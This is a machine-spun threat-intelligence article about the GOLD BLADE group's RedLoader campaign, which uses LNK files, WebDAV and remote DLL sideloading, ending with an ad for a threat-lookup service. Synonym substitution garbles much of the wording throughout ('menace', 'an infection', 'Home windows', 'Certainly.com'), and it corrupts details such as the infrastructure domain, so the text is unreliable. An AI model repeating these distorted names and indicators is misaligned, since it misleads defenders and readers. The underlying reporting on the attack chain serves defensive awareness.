The cybersecurity panorama faces a renewed menace because the GOLD BLADE cybercriminal group has considerably advanced their assault methodology, combining beforehand noticed strategies to create a complicated an infection chain.
This new marketing campaign, which surged in July 2025, leverages malicious LNK recordsdata paired with a recycled WebDAV method to deploy their customized RedLoader malware on Home windows programs.
The menace represents a regarding escalation within the group’s capabilities, demonstrating how established menace actors constantly adapt their ways to evade detection and maximize an infection success charges.
The assault begins with a deceptively easy social engineering method, the place menace actors distribute well-crafted cowl letter PDFs by respectable third-party job websites comparable to Certainly.com.
These paperwork comprise malicious hyperlinks that mechanically obtain ZIP archives to victims’ programs, initiating a posh multi-stage an infection course of.
The noticed RedLoader execution chain (Supply – Sophos)
The sophistication lies not within the preliminary supply mechanism, however within the subsequent execution chain that mixes respectable system processes with malicious payloads to determine persistent entry whereas remaining largely undetected by conventional safety measures.
Sophos analysts recognized this new an infection chain whereas investigating the GOLD BLADE group’s evolving ways, noting that whereas the person elements had been noticed individually in earlier campaigns, their mixture represents an unprecedented method to preliminary system compromise.
The researchers noticed that the group beforehand utilized WebDAV strategies for distant DLL execution in September 2024 and DLL sideloading strategies in March 2025, however the July 2025 marketing campaign marks the primary documented occasion of those strategies being orchestrated collectively.
Distant DLL Sideloading: A Technical Deep Dive
Probably the most technically subtle facet of this marketing campaign includes the distant DLL sideloading mechanism that serves as the muse for RedLoader deployment.
As soon as the LNK file executes, it triggers conhost.exe to determine a WebDAV reference to the CloudFlare-hosted area automatinghrservices[.]employees[.]dev.
The malicious infrastructure hosts a renamed model of Adobe’s respectable ADNotificationManager.exe executable, which masquerades as a resume doc to keep up the social engineering pretense.
The vital technical innovation lies within the distant sideloading course of, the place the respectable executable mechanically hundreds the malicious netutils.dll file from the identical distant listing.
This method creates a respectable signed executable that hundreds malicious code with out triggering typical safety alerts.
RedLoader stage 1 then establishes persistence by a scheduled job named BrowserQEBrowserQE_, demonstrating the malware’s functionality to create victim-specific identifiers whereas sustaining constant operational signatures throughout totally different compromised programs.
Combine ANY.RUN TI Lookup together with your SIEM or SOAR To Analyses Superior Threats -> Strive 50 Free Trial Searches
